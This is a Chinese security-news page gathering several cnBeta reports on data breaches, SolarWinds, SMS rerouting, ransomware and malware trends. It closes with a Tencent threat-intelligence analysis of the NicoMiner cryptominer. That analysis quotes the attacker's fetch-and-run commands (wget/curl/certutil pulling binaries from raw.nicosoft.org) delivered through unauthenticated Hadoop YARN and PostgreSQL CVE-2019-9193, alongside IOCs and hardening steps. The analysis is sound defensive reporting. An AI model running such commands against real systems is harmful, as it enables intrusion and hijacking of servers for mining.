标签: 黑客

近十年全球信息安全问题集中频发

近日,美国社交媒体脸书(Facebook)超5亿用户的个人数据遭到泄露,包括电话号码、电子邮件等信息。俄媒称,脸书创始人扎克伯格的电话号码也遭泄露。据新闻网站商业内幕(Business Insider)报道,一个低级别的黑客论坛3日曝光了5.33亿脸书用户的个人数据,这些用户涉及 106个国家,泄露的信息包括脸书ID、用户全名、位置、生日、个人简介以及电子邮件地址。 令大众吃惊的是,公布的这些个人隐私信息数据涉及来自 106 个国家的 5.33 亿 Facebook 用户,其中包括 3200 万美国用户,1100 万英国用户,600 万印度用户。 俄罗斯卫星通信社4日报道,遭泄露的5.33亿脸书用户数据中包含一些名人的信息,扎克伯格的电话号码也在其中。有消息称,遭泄露的电话号码与扎克伯格的真实号码是一致的。 网络犯罪情报公司Hudson Rock的首席技术官加尔首先发现了脸书用户数据泄露,通过比对他所认识的人的信息,证实至少有一部分内容是真实的。 事发后,脸书公司在4月3日的一份声明中称,上述数据来自2019年发生的信息泄露事件,当年8月已经进行修复。 此前,Facebook曾将8000万用户数据与剑桥分析公司(Cambridge Analytica)进行分享,而后者则将这些数据用于2016年美国大选政治广告,这严重违反了Facebook的服务条款。扎克伯格承认对此事负有责任并道歉。随后,美国联邦贸易委员会对此事展开调查,并对脸书开出50亿美元罚单。 国际上也有应对此事的相关法律条令和组织,例如「GDPR」是 (The European) ,意思为「通用数据保护条例」,是欧盟议会和欧盟理事会在 2016 年 4 月通过,在 2018 年 5 月开始强制实施的规定。 GDPR 本质上来说是一系列「打鸡血」版强制执行隐私条例,规定了企业了在对用户的数据收集、存储、保护和使用时新的标准;另一方面,对于自身的数据,也给予了用户更大处理权。GDPR虽然保护范围只在于欧洲生活的人民,但因为考虑到「全球性」是写入互联网基因内的属性,几乎所有的服务都会受到影响,所以生活在欧洲之外的人其实也会从此条例中获益。 据公开信息纰漏,如果2018年脸书的“剑桥分析事件”发生在了GDPR的管辖范围之内,则其可能被处罚1700万英镑或全球营业额4%的巨额罚款。 全球用户隐私数据泄漏事件愈发频繁 过去,影响几百万人的数据泄露事件就能成为新闻头条,而如今,影响数亿甚至数十亿的事件却比比皆是。 雷锋网通过公开资料,对关于21世纪以来的典型的数据泄漏事件整理,得知主打的数据安全泄漏主要发生在于以下几家公司:Adobe、Adult Friend Finder、Canva、Dubsmash、eBay、Equifax、Heartland 支付系统、LinkedIn、My Fitness Pal、MySpace、雅虎、Zynga等等 以下列举几件具有代表性的事件: 数据泄漏公司:Adobe;日期:2013年10月and2019年10月;影响:1.53亿用户记录 在2013年10月上旬,根据安全博主Brian Krebs的披露,Adobe最初报告说,黑客窃取了将近300万个加密的客户信用卡记录,以及数量不确定的用户登录信息帐户。但根据后来的调查表明,已经有超过1.5亿用户密码被泄露,黑客还暴露了用户名称、ID、密码以及借记卡和信用卡信息。 2015年8月的一项协议要求Adobe支付110万美元的法律费用,并向用户支付赔偿,金额数量并未公开,以解决违反《客户记录法》和不公平商业行为的指控。据报道,2016年11月支付给客户的金额为100万美元。 2019年10月Adobe再次出现数据泄露事故超过700万名用户受影响,所幸这次泄露的数据不含账号密码和信用卡数据等。 数据泄漏公司:Adult Friend Finder;日期:2016年10月;影响:4.122亿个帐户 AdultFriendFinder所属公司被黑客入侵,泄露4.12亿用户数据,这将是2016年最大的一次数据泄露事件,也是20年来最大的一次数据泄露事件。 因为公司在安全方面的欠缺,导致几乎所有的账户密码都泄露了,甚至连已经删除的账户也被黑客翻了出来。在4.12亿数据中,有3.39亿数据来源于AdultFriendFinder网站,有超过1500万数据是已经被删除的用户数据。 仔细分析数据库之后得知,6200万数据来源于Cams.com,700万来源于Penthouse.com,其余的数据则来源其他FriendFinder网站。 数据泄漏公司:eBay;日期:2014年;影响:1.45亿用户 eBay曾与2014年初发生大规模用户数据泄露事故,约1.45亿用户数据遭泄露,这些数据包括用户名、电子邮件地址、家庭地址、电话号码和生日等隐私信息,但eBay表示用户密码经过加密处理,黑客并不容易获得,而用户的信用卡数据并未泄露。 eBay的数据泄露规模甚至超过了美国零售商Target的数据泄露事故(4000万信用卡遭泄露,1.1亿用户数据遭泄露),不过McAfee的副总裁Raj Samani认为eBay泄露的数据中未包含信用卡等支付数据,因此情况并没有Target的数据泄露严重。 数据泄漏公司:LinkedIn;日期:2012年(和2016年);影响:1.65亿用户帐户 LinkedIn是商务专业人士的主要社交网络。对于希望进行社交工程攻击的攻击者来说,LinkedIn极具吸引力。2012年1月,一位名叫“Andrev”的黑客通过Pastebin发布了一则消息,声称其攻击了LinkedIn服务器,并窃取了约1.59亿的用户信息。为证实其行为,他发布了一个包含100个用户的信息名单,名单中包括帐户信息、登陆密码等。据称,泄露的用户中包含一些国际知名企业CEO。 然而,直到2016年该事件的影响范围才完全揭露。出售MySpace数据的黑客仅用5个比特币(当时约为2,000美元)就提供LinkedIn上的用户电子邮件地址和密码。LinkedIn承认已意识到该漏洞,并表示已重设了受影响帐户的密码。 数据泄漏公司:MySpace;日期:2013年;影响:3.6亿用户帐户 早在2007年底,MySpace的Alexa全球排名已经稳定在第六名。曾有数据显示,每个MySpace的注册用户的平均浏览页面数高达30以上,用户粘性极强。而这次事件的主导者就是上次售卖超过1.64亿Linkedln用户数据的同一个黑客,而现在该黑客宣称已经拿到了3亿6000万MySpace用户的电子邮件地址以及密码。 因为有3.6亿个MySpace用户的帐户泄漏,在LeakedSource(可搜索的数据库,其中包含被盗帐户)和暗网市场The Real Deal 上出售,要价为6比特币(当时约为3,000美元)。 据该公司称,丢失的数据包括在2013年6月11日之前创建的部分账户电子邮件、密码和用户名。根据HaveIBeenPwned的Troy Hunt的介绍,密码存储为SHA-1哈希,密码的前10个字符转换为小写。 数据泄漏公司:雅虎;日期:2013-14年;影响:30亿用户帐户 雅虎于2016年9月宣布,自己是2014年里数据泄露事件最大的受害者。攻击者窃取了5亿用户的真实姓名、电子邮件地址、出生日期和电话号码。大多数泄露的密码多哦为散列密码。 在2016年12月,雅虎披露了另一位攻击者自2013年以来的数据窃取行为,该攻击行为泄露了10亿个用户帐户的名称、出生日期、电子邮件地址和密码以及安全性问题和答案。雅虎于2017年10月修订了这一估计数,总计包含30亿用户。 最初的数据泄露公布的时机不好,因为雅虎正在被Verizon收购,后者最终以44.8亿美元的价格收购了Yahoo的核心互联网业务。此次泄露事件使公司价值缩水了约3.5亿美元。 写在最后 当然全球数据泄漏事件不断频发的今日,用户数据隐私保护就变得尤为重要性。GDPR是2018年全球跨国公司数据安全领域所关注的焦点。这一年,受GDPR启发,欧盟之外的其他法域国家也推出了综合性的个人数据安全保护的法规体系。比如: 巴西。2018年8月14日,巴西总统批准了《巴西通用数据保护法》(Lei Geral de Proteção de Dados Pessoais,简称 “LGPD”)。LGPD将于18个月的过渡期后,在2020年2月15日正式生效。实际执行中,2020年8月26日,博索纳罗总统批准了巴西数据保护局(ANPD)的监管结构和整体框架。ANPD将负责监督个人数据保护措施,制定相关指导方针,调查和执行LGPD,并与其他国家数据保护当局开展合作。 就在今年年初,巴西数据保护局(下称ANPD)向外界公布了其监管工作战略规划及2021年至2022年工作计划,其中有提及到ANPD机构的发展愿景即:打造巴西国内及全世界数据保护机构的样板。 美国加州。2018年6月28日,美国加利福尼亚州(“加州”)颁布了《2018年加州消费者隐私法案》(“CCPA”),2020年1月1日正式生效。CCPA旨在加强消费者隐私权和数据安全保护,CCPA被认为是美国国内最严格的隐私立法。 随后2020年11月3日,美国加利福尼亚州选民投票通过第24号提案,即《加州隐私权法案》(CPRA)。CPRA在去年刚刚生效的《加州消费者隐私法》(CCPA)的基础上,将进一步赋予加州居民一些新的权利,比如更正个人信息以及限制敏感个人信息的使用和披露的权利。 新加坡。新加坡的个人数据保护立法已有9年多历史,其《个人数据保护法令》于2012年10月由议会通过,该法主体部分于2014年7月生效。随后该国又制定九部配套的附属立法,其中重要的有2014年《个人数据保护规例》等。 2018年以来,新加坡在个人数据保护法的立法方面又有一些颇受瞩目的新进展,其中主要有2019年1月14日颁布的重要案例、2018年8月31日颁布的《关于国民身份证及其他类别国民身份号码的(个人数据保护法令)咨询指南》和2020年5月14日《个人数据保护法(修订)草案》的公开征求意见稿等。 而国内方面,今年3月19日,国家互联网信息办公室副主任杨小伟19日在新闻发布会上说,目前加紧制定出台《数据安全法》、《个人信息保护法》,从而在法律层面为数据安全和个人隐私保护提供法律保障。正在加紧制定相关法规标准,建立数据资源的确权、开放、流通以及交易的相关制度,从而在运行机制上进一步完善数据产权保护制度,为我们的数据安全和个人隐私、个人信息保护提供制度保障。           (消息来源:cnBeta;封面源自网络)

黑客论坛公开超 5 亿条 Facebook 数据

一个黑客论坛公布了超过5亿Facebook用户的个人数据缓存,这是迄今为止该社交网络在数据保护方面的最大失误之一。该数据库包含了全球数亿Facebook用户的个人数据,这些数据在本周六被发现,有可能被用于各种犯罪,包括其他黑客和社交工程。 网络犯罪研究公司Hudson Rock首席技术官Alon Gal建议,这些数据包括用户的全名,以及Facebook ID、地点、出生日期、个人简历、电话号码和电子邮件地址。安全人员将缓存中的部分数据与Facebook的密码重置功能进行对比验证,发现数据是真实的。 数据中列出了超过5.33亿用户,覆盖106个国家。其中超过3200万条记录是美国用户,1100万条记录来自英国,600万条记录来自印度。 “这么大的数据库,包含了很多Facebook用户的电话号码等私人信息,肯定会有不良分子利用这些数据。”加尔说。 在可能会让受影响的Facebook用户感到沮丧的情况下,Gal在1月份首次发现了一个黑客论坛的用户为一个自动机器人做广告,声称可以爬取数百万用户的电话号码。该机器人收集的数据集似乎是免费发布到论坛上的,使得任何人都可以免费获取。 Gal认为,现阶段除了通知用户警惕利用其个人数据的钓鱼计划或欺诈行为外,既然数据已经流传开来,Facebook作为第一方实际上也没有什么办法应对。             (消息来源:cnBeta;封面源自网络)

美国土安全部要员的邮件账户受 SolarWinds 攻击事件影响

美联社报道称,美国土安全部门要员的电子邮件账户,亦受到了 SolarWinds 恶意软件活动的幕后黑手的影响。据悉,这批账户属于特朗普总统在 2019 年 11 月任命的代理国务卿 Chad Wolf,以及负责调查境外威胁的国土安全部官员。 早在 2020 年 12 月,FireEye 网络安全专家就曝光了波及甚广的 SolarWinds 黑客入侵事件,导致成千上万的企业和政府机构在部署恶意更新后被感染。 周一的报道称,疑似俄方黑客入侵了特朗普政府要员的电子邮件账户,而受害者本就负责着与之对抗的工作。 此外上月的消息称,除了百余家私营企业,SolarWinds 黑客还打击了包括国土安全部在内的至少 9 个联邦机构。 截止外媒发稿时,美国土安全部尚未就此事给出回应。不过美联社称,在事件曝光后的几天里,Char Wolf 等人就已经换成了支持加密聊天的软件服务来开展通信。           (消息来源:cnBeta;封面源自网络)

Canalys 警告:未在网络安全上投入更多的企业将面临“倒闭”

分析公司Canalys警告说,未能在网络安全上投入更多资金的企业将面临 “大量倒闭”。因为研究人员发现过去的12个月里,被入侵的数据比过去15年的总和还要多。勒索软件攻击数量激增,在全球性卫生事件的背景下,医院又成为特殊的目标。由于社交距离和线上工作逐步成为常态,许多企业以牺牲网络安全为代价实施业务连续性措施,进一步加剧了网络安全问题。 Canalys首席分析师Matthew Ball在评论这份全新的有关网络安全的报告时表示: “网络安全必须成为数字计划的前沿和中心,否则将出现大规模的企业组织灭绝,这将威胁到COVID-19大流行后的经济复苏。对网络安全关注的失误已经产生了重大影响,导致当前数据泄露危机的升级和勒索软件攻击的加速。” 虽然Canalys表示,在网络安全支出方面还需要做更多的工作,但它也表示,去年网络安全投资已经明显高于IT行业的其他领域。网络安全支出增长到530亿美元,大增10%,但并非增长最快领域,表现优于网络安全的领域是业务连续性和劳动力生产力,其中云基础设施服务增长33%,云软件增长20%。 从单个公司来看,Zoom的远程沟通方案令其营收猛增300%,微软Office 365办公环境带来的业绩保持了两位数的增长,硬件方面,笔记本电脑的出货量也创下了历史新高,罗技的网络摄像头销量也在蓬勃发展,甚至连Wi-Fi路由器的销量也随着人们转向在家办公而增长了40%。 虽然这些事情都很重要,但Canalys最终还是希望企业增加在网络安全方面的支出,因为不这样做最终可能会因为恢复成本过高而导致企业破产。           (消息及封面来源:cnBeta)

美运营商对短信路由方式做出安全调整

根据帮助短信路由的通信公司Aerialink的公告,美国所有的主要运营商都对短信的路由方式进行了重大改变,以防止黑客能够轻易地对目标短信进行改道。此举是在Motherboard网站调查后发生的。 该调查发现一个黑客,以最小的努力,支付16美元,就可以重新路由短信,然后使用这种能力,闯入一些在线帐户,包括Postmates,WhatsApp和Bumble,暴露了美国电信基础设施存在的一个缺陷。 3月25日来Aerialink公告表示,无线运营商将不再支持在各自的无线号码上启用短信或彩信文本,这一变化是全行业的,影响到移动生态系统中的所有短信提供商。请注意,Verizon、T-Mobile和AT&T已经在全行业范围内收回了被覆盖的支持短信的无线号码。因此,任何Verizon、T-Mobile或AT&T的无线号码,如果曾作为BYON启用文本,则不再通过Aerialink网关路由消息流量。 T-Mobile,Verizon和AT&T没有立即回应评论请求。联邦通信委员会(FCC)和CTIA(运营商的贸易机构)也没有回应评论请求。上周,Motherboard公布了一项调查,其中假名Lucky225的黑客向一家名为Sakari的公司支付了一小笔钱,以证明这个问题,此前并没有详细报道。Sakari是一家帮助企业进行短信营销和群发信息的公司。作为其中的一部分,Sakari从另一家名为Bandwidth的公司获得了短信改道的能力,而Bandwidth又从另一家名为NetNumber的公司获得了这种能力。 当输入相应的电话号码时,Lucky225被要求签署一份文件,基本上是用小指头发誓确保目标已同意短信改道。Lucky225真实身份是网络安全公司Okey Systems的首席信息官,在输入Motherboard提供的电话号码几分钟后,Lucky225就开始收到原本要发给Motherboard手机的短信。从这里,Lucky225登录了各种使用短信作为登录或认证机制的服务。 不难看出,这种攻击对安全保障造成的巨大威胁。美国联邦通信委员会必须利用其权力迫使电话公司保护其网络免受黑客攻击。对此,Sakari公司联合创始人Adam Horsman表示,Sakari推出了一项安全功能,输入的号码会收到一个自动呼叫,以确保号码所有者同意信息改道。现在,随着运营商切断手机号码短信的启用,广大的商业短信公司生态系统很可能根本无法执行这项服务。 Horsman在周四的一份声明中告诉Motherboard,我们欢迎这一消息,并希望行业内的其他公司也能效仿。我们Sakari的政策一直是只支持VoIP和固定电话号码的短信功能,一旦行业问题被提出,我们就对任何移动号码进行了全面封杀。 作为我们内部审计的一部分,除了Lucky225的账户,我们没有发现其他手机号码受到影响。           (消息来源:cnBeta;封面源自网络)

俄罗斯男子承认密谋敲诈特斯拉

据外媒报道,美检察官和法庭记录显示,一名俄罗斯男子在美国认罪,他曾向特斯拉一名员工提供100万美元让其用勒索软件将特斯拉位于内华达州的大型电动电池工厂的网络瘫痪,另外还借此盗取该公司的机密信息以进行进一步的敲诈勒索。 Egor Igorevich Kriuchkov于当地时间周四在美国地方法院认罪。网络安全专家称Kriuchkov承担的风险是特殊的。法院为其指定的联邦公设辩护律师Chris Frey拒绝对外界置评。 美检察官指控Kriuchkov代表国外同谋者试图通过面对面的贿赂来招募一名内部人员来植入勒索软件。据悉,这种软件会破坏目标网络上的数据,其只有通过攻击者提供的软件密钥才能解锁。通常情况下,从安全的避风港操作的勒索软件团伙会通过互联网侵入受害者的网络并在激活勒索软件之前下载数据。 对此,杀毒软件公司EMSIsoft网络安全分析师Brett Callow评论道:“他们冒这样的风险或许可以表明,这是一次旨在获取信息的情报行动,而非旨在获取金钱的勒索行动…也有可能是犯罪分子认为赌博是值得的并决定掷骰子。” 网络安全公司FireEye首席技术官Charles Carmakal对此表示赞同。他说道:“你可以在几千英里以外的地方进行,而这不需要承担任何资产风险。” FBI表示,这名未透露姓名的潜在招募者通知了特斯拉并跟联邦调查局合作从而在造成任何损害之前使得这场阴谋被阻止了。 去年9月,27岁的Kriuchkov告诉法官,他知道俄罗斯政府知道他的案子。但美检察官和FBI没有指控他跟克里姆林宫存在联系。Kriuchkov目前被关押在雷诺的瓦肖县监狱。 Kriuchkov承认故意破坏一台受保护的电脑,这可能使他面临最高5年的监禁和25万美元的罚款。然而根据书面认罪协议,他将只需面临不到10个月的刑期。 自8月在洛杉矶被捕以来,他已经被拘留了7个月。联邦当局称,他当时正前往机场准备飞往国外。 法庭文件还显示,去年7月和8月,Kriuchkov持俄罗斯护照和旅游签证在美国呆了五个多星期,当时他试图招募一名被认定为为电脑安装黑客软件的雇员。这名未被确认身份的员工将收到用数字加密货币比特币支付的款项。 本案中没有其他同谋嫌疑人受到指控。不过根据法庭记录目前还不清楚资金是否易手。           (消息及封面来源:cnBeta)

Twitter 托管的图片可用来隐藏病毒文件

昨天,一位研究人员披露了一种在Twitter图片中隐藏多达3MB数据的方法。在他的演示中,研究人员展示了包含在Twitter上托管的PNG图像内的MP3音频文件和ZIP档案。 虽然在图像中隐藏非图像数据的艺术(隐身术)并不新颖,但由于图像可以托管在像Twitter这样的热门网站上,而且没有经过杀毒,这就为其被恶意行为者滥用提供了可能。昨天,研究员兼程序员大卫-布坎南在他的推特上附上了实例图片,这些图片中隐藏着整个ZIP档案和MP3文件等数据。 虽然Twitter上托管的附件PNG文件在预览时代表了有效的图像,但仅仅是下载并改变其文件扩展名就足以从同一个文件中获得不同的内容。据BleepingComputer观察,该研究者在推特上发布的6KB图片包含了整个ZIP档案。该ZIP包含了大卫-布坎南的源代码,任何人都可以用它将杂七杂八的内容打包成PNG图片。 对于那些喜欢稍微不动手的人来说,研究者还在GitHub上提供了生成他所谓的tweetable-polyglot-png文件的源代码。在另一个上传到Twitter上的例子中,Buchanan在推特上发布了一张会唱歌的图片。下载这个,重命名为.mp3,在VLC中打开,变成MP3的图片文件就会开始播放Rick Astley的《Never Gonna Give You Up》这首歌。大卫-布坎南表示,你可以在DEFLATE流(文件中存储压缩像素数据的部分)的末尾附加数据,而Twitter不会将其剥离。 隐身威胁行为者经常利用隐身技术,因为他们可以将恶意命令、有效载荷和其他内容隐藏在图像等看似普通的文件中。就在昨天,BleepingComputer报道了一种新的渗透技术,网络犯罪分子利用这种技术将被盗的信用卡数据隐藏在JPG图片中。正如大卫-布坎南所展示的那样,Twitter可能并不总是将无关信息从图片中剥离出来,这一事实为威胁行为者滥用该平台提供了空间。             (消息及封面来源:cnBeta)

2020 年 macOS 恶意软件发展迅速

9to5Mac 报道称:一项针对去年野外发现的新恶意软件的研究表明,macOS 的威胁形势发生了巨大的变化,几乎较 2019 年增加了 1100% 。这项由 Atlas 和 AV-Test 联手开展的调查表明,Mac 用户平均每天面临 1847 个新增威胁。不过结合上下文,可知与同时期 Windows 平台相比,其数量仍不到总威胁的 1% 。 本次调查涉及 Mac 平台的 67 万 4273 个新恶意软件,算是自 2019 年以来的首次大爆发(+1092%)。 作为对比,去年调查发现的新 Mac 恶意软件总数仅为 55556 个,2018 年为 92570 个、2017 年为 28949 个、2016 年更是只有 5208 个。 Atlas 表示,促成 2020 年 macOS 恶意软件数量暴涨的一个主要因素,是因为新恶意软件的工程设计已较以往变得更加容易。 现如今,许多黑客已不需要太高级的编程技能,甚至可以直接购买到现成的代码,然后一键定制出新的恶意软件。 有趣的是,2021 开年至今(3 月中旬),macOS 新增恶意软件的数量反而没有多大的动静(仅为 2474 个)。 至于 Windows 平台,研究发现 2020 年度增加了超过 9100 万个新威胁,是 macOS 威胁的 135 倍以上,平均每天有将近 25 万个新的 Windows 恶意软件。 甚至在 2021 一季度结束前,Windows 平台上就已经遭遇了超过 3300 万个新的恶意软件威胁。           (消息及封面来源:cnBeta)

使用腾讯安全威胁情报分析:黑灰产工具作者终走向木马开发(新挖矿木马 NicoMiner )

摘要 NicoMiner利用三个漏洞入侵传播: Hadoop Yarn未授权访问漏洞 PostgreSQL未授权漏洞 PostgreSQL提权代码执行漏洞(CVE-2019-9193); 利用漏洞入侵成功后会针对Windows、Linux系统分别投放门罗币矿机; 感染量增长较快,一个月内翻倍,受害服务器约3000台; 针对Windows、Linux两个平台的挖矿木马使用相同的钱包; 关联分析发现疑似作者ID:Nico Jiang; 通过腾讯安图查询历史情报,发现作者疑似从事刷量相关的黑产记录。   一、概述 腾讯安全威胁情报中心捕获一起快速增长的挖矿木马NicoMiner,该木马通过Hadoop Yarn未授权访问漏洞、PostgreSQL未授权及提权代码执行漏洞(CVE-2019-9193)进行入侵攻击,会根据操作系统不同分别植入Windows和Linux平台的门罗币挖矿木马。 由于攻击者使用的域名和样本PDB信息中包含“nico jiang”的ID信息,腾讯安全威胁情报中心将该挖矿木马命名为NicoMiner。根据该挖矿木马使用的钱包算力推算,该木马在近一个月内感染量已翻倍,估计受害服务器已达3000台左右。 进一步溯源分析还发现,“nico jiang”在较早时候已从事黑灰产业,该ID陆续注册了与游戏推广、刷量黑灰产有关的域名,近期启用之前留置的相关网络资源从事挖矿黑产。也不排除近期可能有其他黑客掌控 “nico jiang”曾经注册的相关域名和开发设备,用来制作、传播NicoMiner挖矿木马。 腾讯安全全系列产品已支持对NicoMiner挖矿木马攻击传播的各个环节进行检测防御: 排查和加固 由于NicoMiner挖矿木马的攻击呈现明显增长趋势,腾讯安全专家建议企业客户参考以下步骤对系统进行排查和加固: 1.删除进程和文件: 文件: /*/pgsql-*/data/java.* /*/pgsql/data/java.* /*/postgres/*/data/LinuxTF /tmp/java Windows系统 c:\postgresql\*\data\conhost.exe c:\postgresql\*\data\sqltools.exe c:\windows\temp\st.exe c:\program files\postgresql\data\pg*\sqltools.exe 检查CPU占用高的进程: java LinuxTF conhost.exe sqltools.exe 2.加固系统: Hadoop 1)如果Hadoop环境仅对内网提供服务,请不要将其服务开放到外网可访问。 2)如果必须开启公网访问,Hadoop在2.X以上版本提供了安全认证功能,建议管理员升级并启用Kerberos的认证功能,阻止未经授权的访问。 PostgreSQL 1)修改PostgreSQL的访问配置/data/pgsql/9.3/data/pg_hba.conf,限制不受信任的对象进行访问; 2)谨慎考虑分配pg_read_server_files、pg_write_server_files、pg_execute_server_program 角色权限给数据库客户。 二、样本分析 漏洞入侵 1)Hadoop Yarn未授权访问漏洞 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARN是hadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。客户可以向YARN提交特定应用程序进行执行,其中就允许执行相关包含系统命令。 YARN提供有默认开放在8088和8090的REST API(默认前者)允许客户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当,REST API将会开放在公网导致未授权访问的问题,攻击者可以在未授权的情况下远程执行代码。 攻击者通过扫描暴露在公网的的8088端口,发现没有开启特定客户安全认证的集群,并通过YARN RESET API提交应用,提交任务的客户名为dr.who。 攻击者在创建的Hadoop应用中通过Post hxxp://ip:8088/ws/v1/cluster/apps执行恶意命令为: wget hxxp://raw.nicosoft.org/java && chmod x java && ./java || curl -O hxxp://raw.nicosoft.org/java && chmod x java && ./java 该命令从黑客控制的服务器上下载挖矿木马java并启动。 2)PostgreSQL未授权访问漏洞 PostgreSQL未授权访问漏洞主要是由于管理员配置不当形成的。PostgreSQL配置文件在/data/pgsql/9.3/data/pg_hba.conf,如果管理员没有正确的配置信任的主机,(如下图),则会导致任意客户无需密码均可访问PostgreSQL数据库。 3)PostgreSQL提权代码执行漏洞(CVE-2019-9193) 2019年3月安全研究人员披露了PostgreSQL提权代码执行漏洞(CVE-2019-9193)的漏洞细节,具有数据库服务端文件读权限的攻击者利用此漏洞,可执行任意系统命令。 此次披露的漏洞存在于导入导出数据的命令“COPY TO/FROM PROGRAM””中,“pg_read_server_files”组内客户执行上述命令后,可获取数据库超级客户权限,从而执行任意系统命令。该漏洞几乎影响了PostgreSQL的所有版本(从9.3到最新版本),同时也影响了所有的操作系统:Windows,Linux和Mac。 受影响PostgreSQL版本:PostgreSQL >=9.3 攻击者通过批量扫描5432端口发现PostgreSQL服务器,然后利用未授权访问漏洞获得了PostgreSQL数据库的访问权限,接着再利用PostgreSQL提权代码执行漏洞(CVE-2019-9193)根据不同的系统执行以下恶意命令: 针对Linux系统: sh -c curl -O hxxp://raw.nicosoft.org/java && chmod +x java && ./java 针对Windows系统: certutil -urlcache -split -f hxxp://raw.nicosoft.org/conhost.exe conhost.exe&start conhost.exe 挖矿 入侵Linux系统下载的挖矿木马java: 入侵Windows系统后下载的dowanload木马conhost.exe,负责继续下载和启动挖矿木马SqlTools.exe 挖矿木马SqlTools.exe   挖矿使用矿池:xmr.f2pool.com 两种系统下的挖矿木马使用同一个钱包: 42Pv7VF4etz1dDPkjRWDEec2FVoFzSPDYKCsjNXDdusaTShBZZn6nr8GyNsqu8ekjSU17jmu7h6SfLg1Lr3rrJnHVokCbso 钱包收益:7个XMR 过去一个月钱包算力翻番,从150kH/s左右涨到了300kH/s,这也意味着感染的机器翻了一倍,估算在3000台左右。   三、关联分析 分析样本发现,dowanload木马conhost.exe中保留了文件的PDB信息,其中“Nico Jiang”疑似木马作者的ID号。 C:\Users\Nico Jiang\source\repos\NicoSoft\x64\Release\conhost.pdb 通过腾讯安图高级威胁溯源系统查询木马下载使用的域名“raw.nicosoft.org”,同样发现了注册者的名字为“Nico Jiang”,推测该ID号是攻击者的可能性较高。 通过搜索引擎搜索,发现域名注册的QQ邮箱对应QQ号所有者,在某个论坛接一些批量登录工具的开发需求。 该ID注册的另一个域名ns-game.top 通过该域名注册使用的outlook邮箱,查询到在github提交的项目,属于相关平台的辅助管理插件: 结论 从对ID “nico jiang”搜索到的信息来看,可以判断该ID对应的人员是一位软件开发人员,曾经从事一些网站、游戏或知名应用的批量登陆工具,刷量工具的开发,具有一定的灰产属性,而相关记录大都在2016年。 可疑的地方是,注册人显示为”nico jiang”的域名raw.nicosoft.org、ns-game.top的注册时间分别在2017年和2018年,而PDB信息包含”nico jiang”的木马样本conhost.exe编译日期是2021年3月21日(更早的样本也只再2021年2月开始出现),两者相隔较远。 推测可能有两种结论,第一种是”nico jiang”在从事灰产的时候注册了相关域名,并在发现了挖矿具有很大的获利空间之后,转向了制作挖矿木马的黑产,并且使用了之前注册的相关域名来提供下载服务。 第二种是有其他黑产获得了”nico jiang”的域名,以及”nico jiang”所使用过的电脑(PDB路径中的客户名通常是开发机器的客户名)的控制权,并且利用这些资源来开发和传播挖矿木马。根据已有的线索来看,属于第一种情况的可能性较大,腾讯安全威胁情报中心会将相关线索提交给有关部门,以对不法分子进行身份确认和追踪。   三、威胁视角看攻击行为 ATT&CK阶段 行为 侦察 扫描IP端口,确认可攻击目标存在的Web服务:Hadoop Yarn, PostgreSQL等。 资源开发 注册C2服务器,制作downlaoder木马,挖矿木马 初始访问 利用对外开放的Hadoop Yarn, PostgreSQL服务漏洞,植入恶意Payload执行恶意命令进而入侵系统 执行 首先植入恶意脚本执行恶意命令,随后下载挖矿木马 防御规避 木马文件加壳保护,将文件命名伪装为系统文件 影响 门罗币矿机不间断的工作,会导致系统CPU负载过大,大量消耗主机CPU资源,严重影响主机正常服务运行,导致主机有系统崩溃风险。 订阅腾讯安全威胁情报产品,赋能全网安全设备 该团伙相关的威胁数据已加入腾讯安全威胁情报,可赋能给腾讯全系列安全产品,推荐政企客户通过订阅腾讯安全威胁情报产品,让全网安全设备同步具备相应的威胁检测、防御能力。 公有云的安全防护 推荐政企客户在公有云中部署腾讯云防火墙、腾讯主机安全(云镜)等产品检测防御相关威胁。 腾讯云防火墙(云镜)已支持拦截利用PostgreSQL提权代码执行漏洞(CVE-2019-9193)发起的恶意攻击行为。 腾讯主机安全可对病毒攻击过程中产生得木马落地文件进行自动检测,客户可后台一键隔离,删除。 私有云的安全防护 私有云客户可通过腾讯T-Sec高级威胁检测系统进行流量检测分析,及时发现黑客团伙的攻击活动。腾讯T-Sec高级威胁检测系统(御界)可检测到利用PostgreSQL提权代码执行漏洞(CVE-2019-9193)发起的恶意攻击行为。 NicoMiner挖矿木马会危害Linux、Windows双平台系统,推荐企业私有云客户在每台终端、服务器部署腾讯T-Sec零信任无边界访问控制系统(iOA),腾讯iOA集成病毒防护和漏洞修复能力可防御病毒木马对终端和服务器的破坏活动。腾讯iOA通过验证客户身份、设备及应用安全状态确定是否允许客户访问企业业务,确保对企业公有云、私有云以及本地业务的可信访问。无论员工位于何处、使用何设备,都可安全访问企业资源和数据。 腾讯安全响应清单 腾讯安全系列产品针对NicoMiner挖矿木马攻击的具体响应清单如下: 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)威胁情报已加入,可赋能全网安全设备。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考: https://cloud.tencent.com/product/tics 腾讯T-Sec 网络空间风险云监测系统 (CCMS) 1)NicoMiner相关情报已加入。 腾讯安全云监测系统,面向行业客户的监管方和被监管方,结合漏洞扫描、涉敏内容检测、全网威胁情报发现能力等,为客户提供全面、及时的互联网风险监测评估服务,并可提供配套安全管家服务,可对相关风险提供有效的响应处理。 腾讯T-Sec 高级威胁追溯系统 1)NicoMiner相关情报已支持检索,可自动关联分析到该病毒家族最新变种,使用资产。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。腾讯T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud  Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,阻断恶意攻击流量,阻断恶意通信流量: 1)NicoMiner相关联的IOCs已支持识别检测; 2)已支持检测以下漏洞利用攻击: Hadoop未授权访问漏洞、Postgres提权代码执行漏洞CVE-2019-9193 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持NicoMiner关联模块的检测告警,查杀清理。 2)已支持检测主机存在的以下相关漏洞: Hadoop未授权访问漏洞、Postgres未授权访问漏洞 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 